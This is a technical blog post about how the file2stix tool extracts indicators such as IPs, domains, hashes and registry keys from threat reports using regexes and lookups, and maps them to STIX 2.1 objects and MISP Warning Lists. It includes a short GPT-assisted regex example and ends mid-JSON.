If you are reading this blog post via a 3rd party source it is very likely that many parts of it will not render correctly. Please view the post on signalscorps.com for the full interactive viewing experience.
In this post I will describe how observables are extracted from documents and converted to STIX objects by file2stix.
Once the plaintext file has been created, extractions are carried out in two ways:
- Default extractions (built into default code, always happen unless file2stix is asked to ignore)
  - Regular expressions
  - Lookups
- Custom extractions (added by user, used only if file2stix explicitly instructed to do so)
  - Lookups
  - Regular expressions
Lookups vs Regular Expressions
If you look at the extractions file structure for file2stix:
extractions
  default
    regex
      IPv4.txt
      …
      regex-mapping.csv
    lookups
      malware.csv
      …
    enrichments
      ATTACK
        enterprise.csv
        mobile.csv
        ics.csv
      CAPEC
  local
    regex
      custom-regex.txt
      …
      regex-mapping.csv
    lookups
      custom-regex.csv
      …
You can see that there are both default and local versions of lookup and regex files.
Everything under default is what ships with file2stix (and will be overwritten on updates). For user changes or additions, local can be used to avoid data loss on upgrade.
So what is the difference between regex and lookup files?
Every file (except for regex-mapping.csv) under extractions/*/regex is a regular expression extraction. Each extraction (regex) is given its own filename (e.g. ipv4.txt contains extractions for IPv4s).
ipv4.txt currently looks as follows:
\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
To ensure the correct STIX 2.1 mapping is performed, each regular expression must be linked to a supported STIX 2.1 object type. This is done in the regex-mapping.csv file. The regex-mapping.csv file has the schema regex-filename,stix-object.
Continuing the ipv4 example, this would be mapped in regex-mapping.csv as follows:
ipv4.txt,IPv4Only
This means any value detected using the regex in ipv4.txt will be mapped to the ipv4 STIX object created by file2stix (as described later in this post).
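To make the relationship between the regex files and regex-mapping.csv concrete, here is a minimal Python sketch. It is not the file2stix implementation: the function names are hypothetical, and it assumes each .txt file holds a single pattern and that the mapping file has exactly two columns.

```python
import csv
import re
from pathlib import Path


def load_regex_extractions(regex_dir):
    """Return {classification: compiled pattern} for one regex directory.

    Assumes regex-mapping.csv has two columns (regex-filename,stix-object)
    and that each regex file holds a single pattern.
    """
    regex_dir = Path(regex_dir)
    extractions = {}
    with open(regex_dir / "regex-mapping.csv", newline="") as handle:
        for row in csv.reader(handle):
            if len(row) != 2:
                continue  # skip blank or malformed rows
            filename, classification = (cell.strip() for cell in row)
            pattern = (regex_dir / filename).read_text().strip()
            extractions[classification] = re.compile(pattern)
    return extractions


def extract(text, extractions):
    """Return a sorted list of unique (classification, matched value) pairs."""
    found = set()
    for classification, pattern in extractions.items():
        for match in pattern.finditer(text):
            found.add((classification, match.group(0)))
    return sorted(found)
```

Pointing load_regex_extractions at a directory containing ipv4.txt and a mapping row of ipv4.txt,IPv4Only would tag every IPv4 match with the IPv4Only classification.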
file2stix currently supports the following default observable extraction types to create STIX Objects from regular expressions (in brackets is the file2stix classification):
- ipv4 (IPv4Group)
  - ipv4 only (IPv4Only), e.g. 198.51.100.3
  - ipv4 with CIDR (IPv4CIDR), e.g. 198.51.100.0/24
  - ipv4 with port (IPv4Port), e.g. 198.51.100.0:80
- ipv6 (IPv6Group)
  - ipv6 only (IPv6Only), e.g. 2001:0db8:85a3:0000:0000:8a2e:0370:7334
  - ipv6 with CIDR (IPv6CIDR), e.g. 2002::abcd:ffff:c0a8:101/64
  - ipv6 with port (IPv6Port), e.g. [2001:0db8:85a3:0000:0000:8a2e:0370:7334]:80
- Domain (DomainNameGroup)
  - Domain (DomainNameOnly), e.g. example.com
  - Sub-Domain (DomainNameSub), e.g. a.sub.domain.example.com
- URL (URLGroup)
  - URL full (URLFull), e.g. https://example.com/research/index.html
  - URL part (URLPart), e.g. https://example.com/research/
- File name (FileName), e.g. badfile.exe
- Directory Path (DirectoryPathGroup)
  - Windows (DirectoryPathWindows), e.g. C:\Windows\System32
  - UNIX (DirectoryPathUNIX), e.g. /System/Library/LaunchDaemons
- File hash (FileHashGroup)
  - MD5 hash (FileHashMD5), e.g. 79054025255fb1a26e4bc422aef54eb4
  - SHA-1 hash (FileHashSHA-1), e.g. 86F7E437FAA5A7FCE15D1DDCB9EAEAEA377667B8
  - SHA-256 hash (FileHashSHA-256), e.g. F4BF9F7FCBEDABA0392F108C59D8F4A38B3838EFB64877380171B54475C2ADE8
  - SHA-512 hash (FileHashSHA-512), e.g. 1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546f369fbbbce8c12cfc7957b2652fe9a75
  - SSDEEP hash (FileHashSSDeep), e.g. 24:Ol9rFBzwjx5ZKvBF+bi8RuM4Pp6rG5Yg+q8wIXhMC:qrFBzKx5s8sM4grq8wIXht
  - SHA3-256 hash (FileHashSHA3-256)
  - SHA3-512 hash (FileHashSHA3-512)
- Email Address (EmailAddress), e.g. [email protected]
- MAC Address (MacAddress), e.g. d2:fb:49:24:37:18
- Windows Registry Key (WindowsRegistryKey), e.g. HKEY_LOCAL_MACHINE\Software\Classes
- User Agent (UserAgent), e.g. Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113
- Autonomous System Number (ASN) (AutonomousSystemNumber), e.g. ASN15139 / ASN 15139 / AS15139 / AS 15139
- Cryptocurrency (CryptocurrencyGroup)
  - Bitcoin address (BTC) (CryptocurrencyBTC), e.g. 3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5
  - Ethereum address (ETH) (CryptocurrencyETH), e.g. 0xb794f5ea0ba39494ce839613fffba74279579268
  - Monero address (XMR) (CryptocurrencyXMR), e.g. 888tNkZrPN6JsEgekjMnABU4TBzc2Dt29EPAvkRxbANsAnjyPbb3iQ1YBRk1UXcdRsiKc9dhw
- CVE (CVE), e.g. CVE-2022-00001
  - CVE IDs follow the format CVE-YYYY-NNNN, where YYYY is the year and NNNN is the numeric ID of the CVE (four or more digits).
- CPE (CPE), e.g. cpe:2.3:o:apple:mac_os_x:10.1.3:*:*:*:*:*:*:*
- Countries (CountryGroup)
  - Country Name (CountryName), e.g. United Kingdom
  - Country Code (CountryCode), e.g. GB
- Credit Card (CreditCardGroup)
  - Mastercard (CreditCardMastercard), e.g. 5555555555554444
  - Visa (CreditCardVisa), e.g. 4242424242424242
  - Amex (CreditCardAmex), e.g. 378282246310005
  - Union Pay (CreditCardUnionPay), e.g. 6200000000000005
  - Diners (CreditCardDiners), e.g. 3056930009020004
  - JCB (CreditCardJCB), e.g. 3566002020360505
  - Discover (CreditCardDiscover), e.g. 6011111111111117
  - Card numbers are typically between 13 and 19 digits long (e.g. 15 for Amex, 16 for Visa and Mastercard) and the type of card can be determined from the leading digits (e.g. 4 for Visa). This makes card numbers straightforward to identify using regular expressions.
- International Bank Account Number (IBAN) (IBAN), e.g. DE29100500001061045672 / GB94BARC10201530093459
  - IBANs start with the country code. The country determines the length of the IBAN and its structure (they are not all the same). However, as each country's structure must follow the same overall format, a regular expression can be used to match all IBAN country variations.
- YARA Rule (YaraRule), see the example later in this post
- SIGMA Rule (SigmaRule), see the example later in this post
More detail on those later.
That covers regular expression extractions, but one of the design decisions for file2stix was to make it easy for users to write in their own extractions, even if they don’t understand regex, in a modular way. This is where lookups come in.
Lookups ask the user to define a string of text for extraction (e.g. “bad actor”) and a supported STIX mapping in a CSV.
"ryuk",malware
"darkhotel",malware
"patch",course-of-action
The following STIX 2.1 Objects are supported for custom extractions generated by a lookup:
- Attack Pattern (attack-pattern). Values set:
  - name: value extracted by the lookup
- Campaign (campaign). Values set:
  - name: value extracted by the lookup
- Course of Action (course-of-action). Values set:
  - name: value extracted by the lookup
- Infrastructure (infrastructure). Values set:
  - name: value extracted by the lookup
  - infrastructure_types: unknown
- Intrusion Set (intrusion-set). Values set:
  - name: value extracted by the lookup
- Malware (malware). Values set:
  - name: value extracted by the lookup
  - malware_types: unknown
  - is_family: true
- Threat Actor (threat-actor). Values set:
  - name: value extracted by the lookup
  - threat_actor_types: unknown
- Tool (tool). Values set:
  - name: value extracted by the lookup
  - tool_types: unknown
e.g. to search a document for the string “RYUK” and create a Malware STIX 2.1 SDO if a match is identified;
"ryuk",malware
The resulting malware STIX object for the extraction from the lookup would look as follows;
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"name": "Ryuk",
"malware_types": ["unknown"],
"is_family": true
}
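The lookup flow can be sketched in a few lines of Python. This is an illustration only, not file2stix's code: the helper names are hypothetical, matching is assumed to be case-insensitive, the name is taken verbatim from the text, and plain dictionaries stand in for objects built with the STIX2 library.

```python
import csv
import io
import re
import uuid

# Extra properties set per STIX type, following the lookup object list above.
DEFAULT_PROPERTIES = {
    "infrastructure": {"infrastructure_types": ["unknown"]},
    "malware": {"malware_types": ["unknown"], "is_family": True},
    "threat-actor": {"threat_actor_types": ["unknown"]},
    "tool": {"tool_types": ["unknown"]},
}


def load_lookups(csv_text):
    """Parse rows of "search string",stix-type into (string, type) pairs."""
    rows = csv.reader(io.StringIO(csv_text))
    return [(row[0], row[1]) for row in rows if len(row) == 2]


def run_lookups(text, lookups):
    """Create one STIX-like dict per lookup string found in the text."""
    objects = []
    for needle, stix_type in lookups:
        # Assumption: lookups are matched case-insensitively.
        match = re.search(re.escape(needle), text, flags=re.IGNORECASE)
        if match is None:
            continue
        obj = {
            "type": stix_type,
            "spec_version": "2.1",
            "id": f"{stix_type}--{uuid.uuid4()}",
            "name": match.group(0),
        }
        obj.update(DEFAULT_PROPERTIES.get(stix_type, {}))
        objects.append(obj)
    return objects
```

Only one object is created per lookup row, however many times the string appears in the text.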
There are also two types of special default extractions that are performed using lookups from existing knowledge-bases:
- MITRE ATT&CK (MITREAttackGroup)
  - Enterprise ATT&CK (MITREEnterpriseAttack)
  - Mobile ATT&CK (MITREMobileAttack)
  - ICS ATT&CK (MITREICSAttack)
- MITRE CAPEC (MITRECapec)
For these, file2stix pulls in the remote knowledge-bases for ATT&CK and CAPEC respectively to search through for extractions. I will also explain that later in this post.
A brief tangent on GPT for regular expression creation
Many of you reading this might be attempting to create your own regular expressions for file2stix. In my previous posts I’ve talked about using GPT to create observable extractions from plain text.
GPT is also helpful in creating regular expressions for such extractions (and explaining their logic!). Take for example IP addresses…
Input
Write a regular expression that detects IP addresses
Output
Sure! Here’s a regular expression that can be used to detect IP addresses:
\b(?:\d{1,3}\.){3}\d{1,3}\b
Explanation:
- \b matches a word boundary to ensure that the IP address is not part of a larger word.
- (?:\d{1,3}\.){3} matches a group of three digits followed by a dot, repeated three times. This accounts for the first three octets of the IP address.
- \d{1,3} matches the fourth octet of the IP address, which can have 1-3 digits.
- \b matches another word boundary to ensure the IP address is complete.
This regular expression will match IP addresses in the format xxx.xxx.xxx.xxx, where each x represents a number from 0 to 255.
Please note that this regular expression alone cannot verify whether an IP address is valid or not (e.g., it will match 999.999.999.999, which is not a valid IP address). It only detects patterns that resemble IP addresses.
Input
Please make sure the regular expression ensures the IP address is valid
Output
Certainly! Here’s an updated regular expression that not only detects IP addresses but also validates whether they are valid:
\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
Explanation:
- \b matches a word boundary to ensure that the IP address is not part of a larger word.
- (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\. matches the first three octets of the IP address. It includes three alternatives separated by |:
  - 25[0-5] matches numbers between 250 and 255.
  - 2[0-4][0-9] matches numbers between 200 and 249.
  - [01]?[0-9][0-9]? matches numbers between 0 and 199, allowing for leading zeros.
  - \. matches the dot separator between octets.
- The previous group is repeated three times with (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\. to match the first three octets.
- (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) matches the fourth octet of the IP address, using the same alternatives as before.
- \b matches another word boundary to ensure the IP address is complete.
This updated regular expression will not only detect IP addresses in the format xxx.xxx.xxx.xxx but will also validate that each octet is a valid number between 0 and 255.
Input
Please also identify IP addresses with ports in the regular expression (e.g. 1.1.1.1:80)
Output
Certainly! Here’s an updated regular expression that detects IP addresses with optional ports:
\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(?::\d{1,5})?\b
Explanation:
- \b matches a word boundary to ensure that the IP address is not part of a larger word.
- (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\. matches the first three octets of the IP address, just like before.
- The previous group is repeated three times with (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\. to match the first three octets.
- (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) matches the fourth octet of the IP address, using the same alternatives as before.
- (?::\d{1,5})? matches an optional colon followed by 1 to 5 digits, representing the port number.
- \b matches another word boundary to ensure the IP address is complete.
This updated regular expression will detect IP addresses in the format xxx.xxx.xxx.xxx and also IP addresses with optional ports in the format xxx.xxx.xxx.xxx:port, where each x represents a number from 0 to 255, and port represents a valid port number.
Input
Can you also include the detection of CIDR ranges in the extractions (e.g. 1.1.1.1/24). The regular expression should optionally detect ports OR CIDRs please?
Output
Certainly! Here’s an updated regular expression that detects IP addresses with optional ports or CIDR ranges:
\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(?::\d{1,5})?(?:\/(?:3[0-2]|[12]?[0-9]))?\b
Explanation:
- \b matches a word boundary to ensure that the IP address is not part of a larger word.
- (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\. matches the first three octets of the IP address, just like before.
- The previous group is repeated three times with (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\. to match the first three octets.
- (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) matches the fourth octet of the IP address, using the same alternatives as before.
- (?::\d{1,5})? matches an optional colon followed by 1 to 5 digits, representing the port number.
- (?:\/(?:3[0-2]|[12]?[0-9]))? matches an optional forward slash followed by a number between 0 and 32, representing the CIDR range.
- \b matches another word boundary to ensure the IP address is complete.
This updated regular expression will detect IP addresses in the format xxx.xxx.xxx.xxx, IP addresses with optional ports in the format xxx.xxx.xxx.xxx:port, and IP addresses with optional CIDR ranges in the format xxx.xxx.xxx.xxx/cidr, where each x represents a number from 0 to 255, port represents a valid port number, and cidr represents a valid CIDR range.
Hopefully this gives you some inspiration for building your own regular expressions. Back to file2stix…
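Whatever generates a regular expression, it is worth running it against known-good and known-bad samples before adding it to file2stix. The short Python sketch below does that for the first and last patterns from the conversation above; the helper name and sample strings are my own. Note the last sample: the final pattern accepts a port and a CIDR together, which is broader than the "ports OR CIDRs" that was asked for.

```python
import re

OCTET = r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

# First (naive) pattern and final (validating, port/CIDR) pattern from above.
NAIVE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
FINAL = re.compile(
    r"\b(" + OCTET + r"\.){3}" + OCTET
    + r"(?::\d{1,5})?(?:\/(?:3[0-2]|[12]?[0-9]))?\b"
)


def first_match(pattern, text):
    """Return the first matched substring, or None if nothing matches."""
    match = pattern.search(text)
    return match.group(0) if match else None


samples = [
    "999.999.999.999",  # invalid octets
    "1.1.1.1",
    "1.1.1.1:80",
    "1.1.1.1/24",
    "1.1.1.1:80/24",  # port and CIDR together
]
for sample in samples:
    print(sample, "->", first_match(NAIVE, sample), "|", first_match(FINAL, sample))
```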
Dealing with similar regular expression extractions
Regular expressions pattern match. A lot of default regular expression extraction tools can be found online for common observables (validators is just one example).
Whilst these are fairly accurate most of the time, some observables look similar enough to each other that additional logic is needed to ensure the correct extractions are made.
Here are some of the similarities I’ve identified, and how file2stix deals with them…
Domain (+ URLs and emails) vs. filenames
Regular expressions can incorporate known top level domain extensions (e.g. .com). Lots of public TLD dictionaries exist to do this.
Similarly, dictionaries of file extension types also exist and can be used in the file name extractions.
However, the proliferation of new top level domains and file extensions over the last few years, rightly or wrongly (e.g. was .zip really a good idea for security!?!), can make it hard to distinguish domains from filenames with extensions. For example, myreport.zip could be identified as both a filename and a domain.
Luckily, in many cases (but not always) domains in intelligence reports are written with the appropriate network protocol (typically either http:// or https://, or @ in the case of emails), which can be included in the regular expression.
domain.zip
Would only extract as a filename.
https://domain.zip
Would only extract as a domain name.
[email protected]
Would extract as a domain name and an email address.
Domain vs. subdomain (vs. filenames)
Domain names can incorporate sub parts (subdomains). Let's imagine the plaintext file contains the following:
this is my file with https://a.sub.domain.zip
When a subdomain is detected, domain or filename extractions are ignored. So this text would only extract the subdomain (a.sub.domain.zip).
Filetypes
Filetypes generally only contain a single . so…
this is my file with a.sub.domain.zip and a domain.zip
Would only extract one domain.zip filename. The string a.sub.domain.zip would be completely ignored.
URLs vs. UNIX directory paths vs. Filenames
Let's imagine we have the URL https://example.com/research/index/example.html in a text file.
A human can identify this as the URL https://example.com/research/index/example.html. That said, it could also be considered a domain (example.com), a UNIX filepath (/research/index/), and a filename (example.html).
When a full URL is detected (e.g. https://example.com/research/index/example.html), only a domain (e.g. example.com) and URL observable (e.g. https://example.com/research/index/example.html) will be extracted (and not a filepath or filename).
Similarly, when a partial URL is detected (e.g. https://example.com/research/index/), only a domain (e.g. example.com) and URL observable (e.g. https://example.com/research/index/) will be extracted (and not a filepath or filename).
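One way to express the URL precedence rule is to extract URLs first and then discard any filepath or filename match that sits inside a URL's span. The Python sketch below illustrates that idea only. The three patterns are deliberately simplified stand-ins (not the file2stix regexes), the function name is hypothetical, and the domain that would also be extracted is left out for brevity.

```python
import re

# Hypothetical, simplified patterns for illustration only.
PATTERNS = {
    "URL": re.compile(r"https?://[^\s]+"),
    "DirectoryPathUNIX": re.compile(r"/(?:[\w.-]+/)+"),
    "FileName": re.compile(r"\b[\w-]+\.(?:html|exe|zip)\b"),
}


def extract_without_overlaps(text):
    """Extract URLs, then keep only path/filename matches outside any URL."""
    url_spans = [m.span() for m in PATTERNS["URL"].finditer(text)]
    results = [("URL", text[start:end]) for start, end in url_spans]
    for kind in ("DirectoryPathUNIX", "FileName"):
        for m in PATTERNS[kind].finditer(text):
            inside_url = any(
                start <= m.start() and m.end() <= end for start, end in url_spans
            )
            if not inside_url:
                results.append((kind, m.group(0)))
    return results
```

For the text "see https://example.com/research/index/example.html and badfile.exe", the path and example.html matches are dropped because they fall within the URL, while badfile.exe is kept.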
Windows Registry Key and Windows filepath
C:\Windows\System32 can look similar to Windows Registry Keys such as HKEY_LOCAL_MACHINE\Software\Classes.
To help solve this problem, we can also use a list of known prefixes for each observable type (e.g. C: or HKEY_LOCAL_MACHINE).
For Windows Registry Keys there are seven predefined root keys (e.g. HKEY_LOCAL_MACHINE), one of which must be present: HKEY_CLASSES_ROOT (or HKCR), HKEY_CURRENT_USER (or HKCU), HKEY_LOCAL_MACHINE (or HKLM), HKEY_USERS (or HKU), HKEY_CURRENT_CONFIG (or HKCC), HKEY_PERFORMANCE_DATA, and HKEY_DYN_DATA. These are then followed by a directory path with directories separated by \.
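The prefix approach can be sketched as follows. These are simplified patterns written for this post rather than the ones shipped with file2stix; in particular they assume path segments contain no whitespace, and the classify helper is hypothetical.

```python
import re

# Root keys (and abbreviations) listed above.
ROOT_KEYS = [
    "HKEY_CLASSES_ROOT", "HKCR",
    "HKEY_CURRENT_USER", "HKCU",
    "HKEY_LOCAL_MACHINE", "HKLM",
    "HKEY_USERS", "HKU",
    "HKEY_CURRENT_CONFIG", "HKCC",
    "HKEY_PERFORMANCE_DATA",
    "HKEY_DYN_DATA",
]

# One or more "\segment" parts, where a segment has no backslash or whitespace.
SEGMENTS = r"(?:\\[^\\\s]+)+"

REGISTRY_KEY = re.compile(r"\b(?:" + "|".join(ROOT_KEYS) + r")" + SEGMENTS)
WINDOWS_PATH = re.compile(r"\b[A-Za-z]:" + SEGMENTS)


def classify(value):
    """Return the classification implied by the value's prefix, if any."""
    if REGISTRY_KEY.fullmatch(value):
        return "WindowsRegistryKey"
    if WINDOWS_PATH.fullmatch(value):
        return "DirectoryPathWindows"
    return None
```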
User Agent vs. UNIX filepath
User agents can be fairly complex. For example, Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36.
User Agents should follow RFC7231.
The problem here is that there is no defined prefix for user agent strings; they can be anything.
There are a few example regular expressions on the internet to extract user agent patterns which hard-code the prefix (Mozilla, AppleWebKit, etc.) and format. file2stix uses a similar approach.
As you can see, parts of the user agent string look like UNIX paths (e.g. Chrome/58.0.3029.83). When a user agent is detected, no UNIX paths are extracted for any part of the user agent.
Filehash vs Cryptocurrency transactions
Many cryptocurrencies use common hash algorithms to register transactions on the blockchain (e.g. BTC uses SHA-256). These same algorithms are used to fingerprint malware. There is no concrete way to differentiate between a cryptocurrency transaction and malware fingerprint.
Therefore generic extractions like this would detect both a file hash and a BTC cryptocurrency observable for SHA-256 hashes in an input.
What makes it worse is that the resulting hashes are not always written at a fixed length:
SHA256 produces a string of 32 bytes. This string is usually represented in the hexadecimal format (as 64 characters [0-9a-f]), but it’s not a requirement. One may choose to use a different encoding to make the produced string shorter.
Source: SuperUser
Currently file2stix extracts the following cryptocurrency types:
- BTC (SHA-256)
- ETH (KECCAK-256)
- XMR (RandomX)
And generic filehash types;
- MD5
- SHA-1
- SHA-256
- SHA-512
- SHA3-256
- SHA3-512
- SSDEEP
Therefore only BTC creates an issue with collisions.
As such, a conscious decision was made that both a file hash and a cryptocurrency will be extracted if a SHA-256 is detected.
IPv4/6 port (destination vs. source)
When a port is reported, it could be either a source or destination port (considering only the regular expression extraction).
Generally, threat intel research reports cover destination ports when reported with an IP (they report on what was seen). Therefore, a conscious decision was made that file2stix always classifies IPs with port numbers as showing destination ports.
Countries
English country names and codes can be identified by standard definition dictionaries of ISO codes.
file2stix uses ISO 2, ISO 3, and country names shown in this table for extraction.
A conscious decision was made to only include English-spelt country names at present (namely for simplicity).
Tracking multiple extractions
When a regular expression detects a match, an extraction is made and STIX objects are created. It is very common for the same extraction to appear multiple times in a single report (e.g. 1.1.1.1 printed 20 times in a report).
Typically, you'd only want to extract this once (1 Indicator SDO) versus many times (20 Indicator SDOs). As such, file2stix records the value 20 times, but only creates one object.
file2stix also records the position of the first and last character of each extraction in the plaintext file generated by file2stix. To demonstrate, if the extraction was 1.1.1.1 (from the default regex directory, ipv4.txt file) and the converted plaintext file looked as follows:
my ip address is: 1.1.1.1
The first position would be 18 (the first digit of the extraction, 1, is position 18 counting from 0). The last position of the extraction would be 24.
Now working an example of a duplicate extraction,
my ip address is: 1.1.1.1 1.1.1.1
The first and last positions for the second extraction would be 26 and 32, respectively, but only one IPv4 object would be created.
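The position tracking described above maps naturally onto Python's re.finditer. The following is a small sketch with a hypothetical function name: it groups every occurrence under its unique value, so one object can be created per key while all positions are kept.

```python
import re
from collections import defaultdict

IPV4 = re.compile(
    r"\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}"
    r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
)


def track_positions(text, pattern):
    """Map each unique matched value to its (first, last) character positions."""
    positions = defaultdict(list)
    for match in pattern.finditer(text):
        # match.end() is exclusive, so subtract one to get the last character.
        positions[match.group(0)].append((match.start(), match.end() - 1))
    return dict(positions)


print(track_positions("my ip address is: 1.1.1.1 1.1.1.1", IPV4))
# {'1.1.1.1': [(18, 24), (26, 32)]}
```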
Warning Lists
Warning Lists identify potentially benign file2stix extractions. Do not be confused by the name; Warning Lists in file2stix are the equivalent of whitelists in other products.
file2stix uses MISP Warning Lists (using PyMISPWarningLists) to identify potential extractions that should be whitelisted. These are synced to file2stix and each list is placed in the warning-lists/default/ directory following the same structure as the PyMISPWarningLists repository.
Extracted values that match a Warning List are still converted to STIX 2.1 Objects; however, they will contain external references listing the Warning Lists the extracted value matches, and will also contain indicator_types = benign.
For example;
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--fb715301-acf3-4add-a70a-2b96f5ac15f5",
"created": "2022-09-07T06:18:21.997149Z",
"modified": "2022-09-08T06:13:24.191194Z",
"name": "Domain: google.com",
"indicator_types": [
"unknown",
"benign"
],
"pattern": "[ domain-name:value = 'google.com' ]",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-09-07T06:18:21.997149Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
},
{
"source_name": "MISP Warning List: <LIST NAME>",
"url": "<MISP WARNING LIST GITHUB URL>",
"description": "<MISP WARNING LIST DESCRIPTION>"
},
{
"source_name": "MISP Warning List: <LIST NAME>",
"url": "<MISP WARNING LIST GITHUB URL>",
"description": "<MISP WARNING LIST DESCRIPTION>"
}
]
}
Note, MISP Warning Lists contain a type value (defined in the Warning List JSON). file2stix treats each Warning List differently, depending on its type, as follows:
- string: extracted observable must be an exact match to a Warning List value (e.g. warning list: google.com -> observable: google.com = match)
- substring: extracted observable must contain a Warning List value (e.g. warning list: google -> observable: api.google.com = match)
- hostname: extracted observable must contain a Warning List value
- cidr: extracted observable must be an exact match to a Warning List value
- regex: file2stix does not consider Warning Lists of type regex
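The per-type rules can be summarised in a short Python function. This is a sketch of the rules as described in this post, not the PyMISPWarningLists API: the function name is hypothetical, and it only assumes the type and list keys found in the MISP Warning List JSON.

```python
def matches_warning_list(value, warning_list):
    """Return True if an extracted value matches a MISP-style Warning List.

    warning_list is a dict with "type" and "list" keys, as found in the
    MISP Warning List JSON files.
    """
    list_type = warning_list["type"]
    entries = warning_list["list"]
    if list_type in ("string", "cidr"):
        return value in entries  # exact match required
    if list_type in ("substring", "hostname"):
        return any(entry in value for entry in entries)  # value contains entry
    return False  # "regex" (and any unknown type) is not considered


google = {"type": "substring", "list": ["google"]}
print(matches_warning_list("api.google.com", google))  # True
```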
By default file2stix will compare all MISP Warning lists. You must set this manually either by specifying all warning lists, or the specific ones you’d want to use.
Custom Warning Lists
You can also create your own Warning Lists. Custom Warning Lists must follow the MISP Warning List schema.
file2stix will first check the Warning List is in the expected MISP Warning List format. If not, it will return an error and will not process the file.
If you look at the warning-lists file structure for file2stix:
warning_lists
  default
    - PyMISPWarningLists
  local
    - Custom warning lists for user
Use of Note SDOs
The STIX 2.1 Note SDO is primarily used to provide metadata for each extraction. The note SDO is used in two places.
For report metadata
To help debug issues, and to remind a user what settings they used to process the file, a Note SDO is created and connected to the Report SDO for the input as follows:
{
"type": "note",
"spec_version": "2.1",
"id": "note--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"abstract": "file2stix user configuration data",
"content": "This note captures the user settings entered for processing the report.",
"object_refs": ["<REPORT ID>"],
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
],
"extensions": {
"extension-definition--c42a2e0c-8347-4eb7-ab08-ae1e9740ebf7": {
"extension_type": "property-extension",
"user_settings": {
"owner": "user--<USER UUID>",
"input_filename": "<FILENAME>",
"input_filetype": "<FILETYPE>",
"processed_filename": "file--<FILE UUID>",
"job_uuid": "job--<JOB UUID>",
"defang": "<IF DEFANG SET IS TRUE ELSE FALSE>",
"confidence": "<IF CONFIDENCE SET, ELSE 0 IF NOT SET>",
"tlp": "<IF TLP SET EXPLICITLY, THE TLP LEVEL, ELSE WHITE>",
"error_handling": "<IF ERROR HANDLING SET, HARD OR SOFT, ELSE HARD>",
"output_location": "<LOCAL PATH PRINTED OR S3 BUCKET PATH>",
"misp_warning_lists": [
"<MISP WARNING LISTS SELECTED>",
"<MISP WARNING LISTS SELECTED>"
],
"custom_warning_lists": [
"<CUSTOM WARNING LISTS SELECTED>",
"<CUSTOM WARNING LISTS SELECTED>"
]
},
"file2stix_information": {
"host": "<HOST OF MACHINE>",
"api_version": "<API VERSION USED>"
}
}
}
}
Note, this information is also reported by the jobs API endpoint (described in the next post).
For extraction metadata
To help track extracted values, again mainly for troubleshooting purposes, a Note SDO is created for every SDO created for an extraction.
{
"type": "note",
"spec_version": "2.1",
"id": "note--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"abstract": "Extraction Data for <SDO ID CREATED FOR EXTRACTION>",
"content": "This note indicates the regular expression and location of the extraction for <SDO ID CREATED FOR EXTRACTION>.",
"object_refs": ["<SDO ID CREATED FOR EXTRACTION>"],
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
],
"extensions": {
